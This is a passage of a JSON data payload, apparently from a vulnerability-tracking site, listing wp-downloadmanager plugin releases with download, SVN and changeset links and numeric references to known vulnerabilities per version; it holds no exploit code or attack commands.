ip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.68.7\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.68.6&new_path=%2Fwp-downloadmanager%2Ftags%2F1.68.7",[956,957,958,959,960,961],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":963,"download_url":964,"svn_tag_url":965,"released_at":39,"has_diff":55,"diff_files_changed":966,"diff_lines":39,"trac_diff_url":967,"vulnerabilities":968,"is_current":55},"1.68.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.68.6.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.68.6\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.68.5&new_path=%2Fwp-downloadmanager%2Ftags%2F1.68.6",[969,970,971,972,973,974,975,976,977],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":185,"download_url":979,"svn_tag_url":980,"released_at":39,"has_diff":55,"diff_files_changed":981,"diff_lines":39,"trac_diff_url":982,"vulnerabilities":983,"is_current":55},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.68.5.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.68.5\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.68.4&new_path=%2Fwp-downloadmanager%2Ftags%2F1.68.5",[984,985,986,987,988,989,990,991,992],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":994,"download_url":995,"svn_tag_url":996,"released_at":39,"has_diff":55,"diff_files_changed":997,"diff_lines":39,"trac_diff_url":998,"vulnerabilities":999,"is_current":55},"1.68.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.68.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.68.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.68.2&new_path=%2Fwp-downloadmanager%2Ftags%2F1.68.4",[1000,1001,1002,1003,1004,1005,1006,1007,1008,1009],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1011,"download_url":1012,"svn_tag_url":1013,"released_at":39,"has_diff":55,"diff_files_changed":1014,"diff_lines":39,"trac_diff_url":1015,"vulnerabilities":1016,"is_current":55},"1.68.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.68.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.68.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.68.1&new_path=%2Fwp-downloadmanager%2Ftags%2F1.68.2",[1017,1018,1019,1020,1021,1022,1023,1024,1025,1026],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1028,"download_url":1029,"svn_tag_url":1030,"released_at":39,"has_diff":55,"diff_files_changed":1031,"diff_lines":39,"trac_diff_url":1032,"vulnerabilities":1033,"is_current":55},"1.68.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.68.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.68.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.67&new_path=%2Fwp-downloadmanager%2Ftags%2F1.68.1",[1034,1035,1036,1037,1038,1039,1040,1041,1042,1043],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1045,"download_url":1046,"svn_tag_url":1047,"released_at":39,"has_diff":55,"diff_files_changed":1048,"diff_lines":39,"trac_diff_url":1049,"vulnerabilities":1050,"is_current":55},"1.67","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.67.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.67\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.66&new_path=%2Fwp-downloadmanager%2Ftags%2F1.67",[1051,1052,1053,1054,1055,1056,1057,1058,1059,1060],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1062,"download_url":1063,"svn_tag_url":1064,"released_at":39,"has_diff":55,"diff_files_changed":1065,"diff_lines":39,"trac_diff_url":1066,"vulnerabilities":1067,"is_current":55},"1.66","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.66.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.66\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.65&new_path=%2Fwp-downloadmanager%2Ftags%2F1.66",[1068,1069,1070,1071,1072,1073,1074,1075,1076,1077],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1079,"download_url":1080,"svn_tag_url":1081,"released_at":39,"has_diff":55,"diff_files_changed":1082,"diff_lines":39,"trac_diff_url":1083,"vulnerabilities":1084,"is_current":55},"1.65","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.65.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.65\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.64&new_path=%2Fwp-downloadmanager%2Ftags%2F1.65",[1085,1086,1087,1088,1089,1090,1091,1092,1093,1094],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1096,"download_url":1097,"svn_tag_url":1098,"released_at":39,"has_diff":55,"diff_files_changed":1099,"diff_lines":39,"trac_diff_url":1100,"vulnerabilities":1101,"is_current":55},"1.64","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.64.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.64\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.63&new_path=%2Fwp-downloadmanager%2Ftags%2F1.64",[1102,1103,1104,1105,1106,1107,1108,1109,1110,1111],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1113,"download_url":1114,"svn_tag_url":1115,"released_at":39,"has_diff":55,"diff_files_changed":1116,"diff_lines":39,"trac_diff_url":1117,"vulnerabilities":1118,"is_current":55},"1.63","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.63.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.63\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.62&new_path=%2Fwp-downloadmanager%2Ftags%2F1.63",[1119,1120,1121,1122,1123,1124,1125,1126,1127,1128],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1130,"download_url":1131,"svn_tag_url":1132,"released_at":39,"has_diff":55,"diff_files_changed":1133,"diff_lines":39,"trac_diff_url":1134,"vulnerabilities":1135,"is_current":55},"1.62","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.62.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.62\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.61&new_path=%2Fwp-downloadmanager%2Ftags%2F1.62",[1136,1137,1138,1139,1140,1141,1142,1143,1144,1145],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1147,"download_url":1148,"svn_tag_url":1149,"released_at":39,"has_diff":55,"diff_files_changed":1150,"diff_lines":39,"trac_diff_url":1151,"vulnerabilities":1152,"is_current":55},"1.61","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.61.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.61\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.50&new_path=%2Fwp-downloadmanager%2Ftags%2F1.61",[1153,1154,1155,1156,1157,1158,1159,1160,1161,1162],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1164,"download_url":1165,"svn_tag_url":1166,"released_at":39,"has_diff":55,"diff_files_changed":1167,"diff_lines":39,"trac_diff_url":1168,"vulnerabilities":1169,"is_current":55},"1.50","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.50.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.50\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.40&new_path=%2Fwp-downloadmanager%2Ftags%2F1.50",[1170,1171,1172,1173,1174,1175,1176,1177,1178,1179],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1181,"download_url":1182,"svn_tag_url":1183,"released_at":39,"has_diff":55,"diff_files_changed":1184,"diff_lines":39,"trac_diff_url":1185,"vulnerabilities":1186,"is_current":55},"1.40","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.40.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.40\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.31&new_path=%2Fwp-downloadmanager%2Ftags%2F1.40",[1187,1188,1189,1190,1191,1192,1193,1194,1195,1196],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1198,"download_url":1199,"svn_tag_url":1200,"released_at":39,"has_diff":55,"diff_files_changed":1201,"diff_lines":39,"trac_diff_url":1202,"vulnerabilities":1203,"is_current":55},"1.31","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.31.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.31\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.30&new_path=%2Fwp-downloadmanager%2Ftags%2F1.31",[1204,1205,1206,1207,1208,1209,1210,1211,1212,1213],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1215,"download_url":1216,"svn_tag_url":1217,"released_at":39,"has_diff":55,"diff_files_changed":1218,"diff_lines":39,"trac_diff_url":1219,"vulnerabilities":1220,"is_current":55},"1.30","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.30.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.30\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.00&new_path=%2Fwp-downloadmanager%2Ftags%2F1.30",[1221,1222,1223,1224,1225,1226,1227,1228,1229,1230],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1232,"download_url":1233,"svn_tag_url":1234,"released_at":39,"has_diff":55,"diff_files_changed":1235,"diff_lines":39,"trac_diff_url":39,"vulnerabilities":1236,"is_current":55},"1.00","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.00.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.00\u002F",[],[1237,1238,1239,1240,1241,1242,1243,1244,1245,1246],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_